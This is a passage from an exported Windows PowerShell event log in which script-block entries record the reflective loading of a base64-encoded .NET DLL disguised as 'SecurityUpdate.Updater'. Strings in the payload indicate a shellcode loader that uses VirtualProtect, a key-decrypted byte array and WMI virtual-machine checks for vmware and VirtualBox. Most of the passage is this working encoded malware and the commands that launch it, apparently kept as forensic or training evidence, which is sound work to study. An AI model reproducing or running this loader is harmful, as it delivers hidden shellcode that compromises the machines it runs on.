1VTAOwMAAAQAAAAI0dVSUQAAAD8DAAAjAIAACNCbG9iAAAAAAAAAAIAAAFX3QI0CQIAAAD6ATMAFgAAAQAAACoAAAAHAAAAEAAAAAgAAAAJAAAAIwAAAAsAAAAQAAAAAQAAAAIAAAABAAAAAQAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAABpBAEAAAAAAAYAgwOcBQYA8AOcBQYAmwJqBQ8AvAUAAAYAwwKjBAYAZgOjBAYARwOjBAYA1wOjBAYAowOjBAYAvAOjBAYA2gKjBAYArwJ9BQYAcwJ9BQYADgOjBAYA9QIaBAYAlATUBQYAKwPUBQYAgQLdBgYAKAaIBAoA5QSWBgoAtQSWBlcALAUAAAoAHgaWBgYARgKIBAYAcQaIBAYAPQSIBAYAjwSIBAYAWAKcBQYAEwKIBAoACQaWBgYANgSIBAYA0AGIBAYADgSIBAYAYwWIBAYAYgWIBAYAGAKIBAYA7wGIBAYAVAR9BQYATwKIBAYA8AWcBQYAxwaIBAYA3AGIBAAAAAC/AAAAAAABAAEAAAAQAP4EJQJNAAEAAQAAAQAAyAAAAE0AAwAFAAMBAAA0AgAAYQAFAAUAAgEAANAEAABtAAUACQATAQAAAQAAAHUAEQAJABMBAAAeAAAAdQARAAkAEQCwAXEBEQDNBnEBMwF+AHUBMwE9AHkBBgaYAX0BVoBJAYABVoDnAIABVoAyAYABVoCBAYABVoBWAYABVoBkAYABVoAjAYABVoByAYABVoD5AIABVoAEAYABVoARAYABUCAAAAAAlgDhBIQBAQAAAAAAgACWIEUGiAEBAPwhAAAAAIYYVQUGAAUABSIAAAAAkRhbBYQBBQAAAAAAAwCGGFUFkwEFAAAAAAADAMYByQEGAAcAAAAAAAMAxgHEAZkBBwAAAAAAAwDGAboBoQEJAAAAAQD/BQAAAgATBAAAAwBUBgIABAA2BgAAAQAvBgAAAgCpAQAAAQBLBAAAAgAvBgAAAQB+BgkAVQUBABEAVQUGABkAVQUKACkAVQUQADEAVQUQADkAVQUQAEEAVQUQAEkAVQUQAFEAVQUQAFkAVQUQAGEAVQUVAGkAVQUQAHEAVQUQAHkAVQUQAIkAVQUaAJEAVQUGAOEAVQUGAKEAVQUQAKEAYQY5AKkARwU+ALEAqAZDAPEAfwRIAJkANARNAPkAJAVNAPkA0QZRAPkAhQZNAPkAywVXALEAtAZcAAEBHQIGABEBZQZgABkBZQZmACEBAQJrADEBBgV0AJkAVQUGAEEBvQZ+AAkAGACaAAkAHACfAAkAIACkAAkAJACpAAkAKACuAAkALACzAAkAMAC4AAkANAC9AAkAOADCAAkAPADHAAkAQADMACcAgwCuAC4ACwCnAS4AEwCwAS4AGwDPAS4AIwDYAS4AKwDmAS4AMwDmAS4AOwDmAS4AQwDYAS4ASwDsAS4AUwDmAS4AWwDmAS4AYwAEAi4AawAuAi4AcwA7AmMAiwCuAAgABgDRAAEAIAAAAAYAAQD3BgAABwAgAFwEAAEFAEUGAQCwMgAAAwCoOQAABAAEgAAAAQAAAAAAAAAAAAAAAAB2BAAABAAAAAAAAAAAAAAAiACgAQAAAAAEAAAAAAAAAAAAAACRAJYGAAAAAAQAAgAFAAIABgADAAcAAwAAAABfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTMyAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MTc4MwBDMjU3NEE2QUM1NzNCQkFEM0E1N0ExRjdENTU2OEI2NDcyRDkyNDc2RTIzMkM0MThENDM4QjdBNjc0QzFEQjI3AEE0OTU2OEIyNUZBMzExQzc4NDU2NkIwOEFBODI3ODE5MjQwREIzRkQ0QUFCMjhGQjUwNDFFMzFEQjJGM0UyRTcAPE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AFBBR0VfRVhFQ1VURV9SRUFEAFBBR0VfR1VBUkQAUEFHRV9OT0NBQ0hFAFBBR0VfV1JJVEVDT01CSU5FAFBBR0VfUkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFAFBBR0VfTk9BQ0NFU1MAUEFHRV9SRUFET05MWQBQQUdFX1dSSVRFQ09QWQBQQUdFX0VYRUNVVEVfV1JJVEVDT1BZAHZhbHVlX18AbXNjb3JsaWIAbWV0aG9kAHNoZWxsY29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASURpc3Bvc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFZhbHVlVHlwZQBEaXNwb3NlAFNlY3VyaXR5VXBkYXRlAFNoZWxsY29kZURlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZHdTaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBNYXJzaGFsAGtlcm5lbDMyLmRsbAB0ZXN0X2RsbC5kbGwAdGVzdF9kbGwAZ2V0X0l0ZW0AU3lzdGVtAEVudW0AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWFuYWdlbWVudE9iamVjdENvbGxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBSdW4ATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAFVwZGF0ZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAVG9Mb3dlcgBNYW5hZ2VtZW50T2JqZWN0RW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAC5jY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpb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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">6b8df088-c8ee-4b5c-82a0-bc8b26234057</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">40961</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>1</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-13 03:16:36.025349"></TimeCreated>
<EventRecordID>118</EventRecordID>
<Correlation ActivityID="{2395a691-55a5-0000-10ab-9523a555d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="3304" ThreadID="4248"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData></EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-13 03:46:01.889885"></TimeCreated>
<EventRecordID>157</EventRecordID>
<Correlation ActivityID="{0cf60e1a-55a9-0003-f821-f60ca955d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4928" ThreadID="3720"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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UkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFAFBBR0VfTk9BQ0NFU1MAUEFHRV9SRUFET05MWQBQQUdFX1dSSVRFQ09QWQBQQUdFX0VYRUNVVEVfV1JJVEVDT1BZAHZhbHVlX18AbXNjb3JsaWIAbWV0aG9kAHNoZWxsY29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASURpc3Bvc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFZhbHVlVHlwZQBEaXNwb3NlAFNlY3VyaXR5VXBkYXRlAFNoZWxsY29kZURlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1